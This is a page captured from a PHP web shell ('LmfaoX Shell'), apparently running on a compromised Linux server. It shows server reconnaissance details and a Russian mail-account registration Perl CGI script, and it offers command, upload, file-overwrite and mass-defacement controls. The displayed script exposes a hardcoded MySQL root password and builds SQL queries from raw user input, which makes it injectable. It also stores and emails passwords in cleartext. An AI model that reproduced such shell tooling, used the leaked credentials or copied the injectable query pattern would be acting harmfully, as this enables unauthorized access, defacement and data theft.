ShellBanner
IP Address: 80.252.133.24:443 You: 216.73.216.93
System:Linux MiraNet 3.0.0-14-generic-pae #23-Ubuntu SMP Mon Nov 21 22:07:10 UTC 2011 i686
Software:Apache. PHP/5.3.6-13ubuntu3.10
ID:uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
Safe Mode:OFF
Open_Basedir:OFF
Freespace:27.43 GB of 70.42 GB (38.95%)
MySQL: ON MSSQL: OFF Oracle: OFF PostgreSQL: OFF Curl: OFF Sockets: ON Fetch: OFF Wget: ON Perl: ON
Disabled Functions: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,

/ http/ cgi-bin/ mail/ - drwxrwxrwx

Directory:
Viewing file:     reg.cgi (4.8 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl

use DBI();
use CGI qw(:standard);

$domain = param("dom");
$quota = param("quot");
$user = param("uname");
$un = param("un");
$pass = param("passwd1");
$pass2 = param("passwd2");
$comment = param("comment");
$asmb = param("asmb");
$login="$user\@$domain";
$home="$domain/$user/";

system "./auth.cgi reg.cgi";
$retcode = $? / 256;
if ($retcode ne "1") {exit;}


#print "Content-type: text/html\n\n";
#system("./ustat $rip |grep 1 > $rip");
open(patt,"<./patt_n1.html")||die "Pattern file 1 not found";
while(<patt>)
    {
    print;
    }
close(patt);

print "<center><h3>Результат регистрации почтового ящика</h3></center>";
        
$database="mail";
$hostname="127.0.0.1";
$port="3306";
$dbuser="root";
$dbpasswd="zopa25703";

#if ($ARGV[2] eq "") {$domain="miranet.ru";} else {$domain=$ARGV[2]};

if ($asmb eq "on") {$user=$login;}

if ($un eq "") {$un = $user;}

if ($quota eq "" or $user eq "" or $pass eq "" or $pass2 eq "")
{
    print "<center><b><font color=#ff2200>ОШИБКА: Заполнены не все поля</font></center></b><br>\n";
    open(patt,"<../../patt_n2.html")||die "Pattern file 2 not found";
    while(<patt>)
    {
    print;
    }
    close(patt);
    exit 0;
}

#if ($passwd ne "zopazopa")
#{
#    print "<center><b><font color=#ff2200>ACCESS DENYED</font></center></b><br>\n";
#    open(patt,"<../../patt_n2.html")||die "Pattern file 2 not found";
#    while(<patt>)
#    {
#    print;
#    }
#    close(patt);
#    exit 0;
#}

if ($pass ne $pass2)
{
    print "<center><b><font color=#ff2200>ОШИБКА: Пароли не совпадают</font></center></b><br>\n";
    open(patt,"<../../patt_n2.html")||die "Pattern file 2 not found";
    while(<patt>)
    {
    print;
    }
    close(patt);
    exit 0;
}


$dsn = "DBI:mysql:database=$database;host=$hostname;port=$port";
$dbh = DBI->connect_cached($dsn, $dbuser, $dbpasswd) || die;
$sth = $dbh->prepare("SELECT login FROM users WHERE login=\"$un\"");
$sth->execute();
($cuser) = $sth->fetchrow_array();
$sth->finish();

$sth = $dbh->prepare("SELECT user FROM users WHERE email=\"$login\"");
$sth->execute();
($cmail) = $sth->fetchrow_array();
$sth->finish();

#print "-- $user -- $cuser -- $cmail --";

$check = "0";
if ($cuser ne "" or $cmail ne "") {print "<center><b><font color=#ff0000><h3>Почтовый ящик не создан</h3></font></center></b>";}
if ($cuser ne "") {print "<center><b><font color=#ffff00>ОШИБКА: Имя пользователя <u>$user</u> принадлежит почтовому ящику <u>$cuser</u></font></center></b>\n"; $check = "1";}
if ($cmail ne "") {print "<center><b><font color=#ffff00>ОШИБКА: Почтовый ящик <u>$login</u> уже существует, имя пользователя <u>$cmail</u></font></center></b>\n"; $check = "1";}
if ($check eq "1") {
print "<hr>
<center><b>| <a href=\"./mail.cgi\">Назад</a> |</b></center>";
open(patt,"<../../patt_n2.html")||die "Pattern file 2 not found";
while(<patt>)
    {
    print;
    }
close(patt);
exit 0;
}        
print "<center><b><font color=#00ddff><h3>Почтовый ящик создан</h3></font></center></b>\n
<table align=center>
<tr><td><b><font color=#ffffff face=\"arial\">Почтовый ящик</b></td><td><b><font color=#ffff00 face=\"arial\">$login</font></b></td></tr>
<tr><td><b><font color=#ffffff face=\"arial\">Имя пользователя</b></td><td><b><font color=#ffff00 face=\"arial\">$un</font></b></td></tr>
<tr><td><b><font color=#ffffff face=\"arial\">Пароль</b></td><td><b><font color=#ffff00 face=\"arial\">$pass</font></b></td></tr>
<tr><td><b><font color=#ffffff face=\"arial\">Лимит</b></td><td><b><font color=#ffff00 face=\"arial\">$quota Мегабайт</font></b></td></tr>
<tr><td><b><font color=#ffffff face=\"arial\">Каталог</b></td><td><b><font color=#ffff00 face=\"arial\">$home</font></b></td></tr>
</table><hr>
<center><b>| <a href=\"./manage.cgi\">Назад</a> |</b></center>
";
open(patt,"<./patt_n2.html")||die "Pattern file 2 not found";
while(<patt>)
    {
    print;
    }
close(patt);

$quotas = $quota*(1024*1024);
$dbh->do("INSERT INTO users VALUES (\"$login\",\"$un\",\"$pass\",\"${quotas}S\",\"$home\",\"0\",\"1\",\"1\",\"$comment\")") || die ;

$dbh->disconnect();

open(MAIL, "|/usr/lib/sendmail -t");
print MAIL "Content-type: text/plain; charset=Windows-1251;\r\n";
print MAIL "To: $login\r\n";
print MAIL "From: root <postmaster>\r\n";
print MAIL "Reply-To: <postmaster>\r\n";
print MAIL "Subject: пЕЦХЯРПЮЖХЪ ОНВРНБНЦН ЪЫХЙЮ\r\n";
print MAIL "оНВРНБШИ ЪЫХЙ $login ГЮПЕЦХЯРПХПНБЮМ\r\n";
print MAIL "нАЗ╦Л ОНВРНБНЦН ЪЫХЙЮ $quota ЛЕЦЮАЮИР\r\n";
print MAIL "\r\n";
print MAIL "---мЮЯРПНИЙХ:\r\n";
print MAIL "\r\n";
print MAIL "хЛЪ ОНКЭГНБЮРЕКЪ:           $un\r\n";
print MAIL "оЮПНКЭ:                     $pass\r\n";
print MAIL "юДПЕЯЮ POP3/SMTP ЯЕПБЕПНБ:  mail.miranet.ru\r\n";
close (MAIL); 
#mkdir ("/home/vmail/$home"0755);
#mkdir ("/home/vmail/$home/.Junk",0755);
#mkdir ("/home/vmail/$home/.Junk/cur",0755);
#mkdir ("/home/vmail/$home/.Junk/new",0755);
#mkdir ("/home/vmail/$home/.Junk/tmp",0755);
#system ("chown -R /home/vmail/"$home);
Command:
Quick Commands:
Upload:
[OK] Max size: 100MB
PHP Filesystem: <@ з
Search File:
regexp
Create File:
Overwrite [OK]
View File:
Mass Defacement:
[+] Main Directory: [+] Defacement Url:
LmfaoX Shell - Private Build [BETA] - v0.1 -; Generated: 0.244 seconds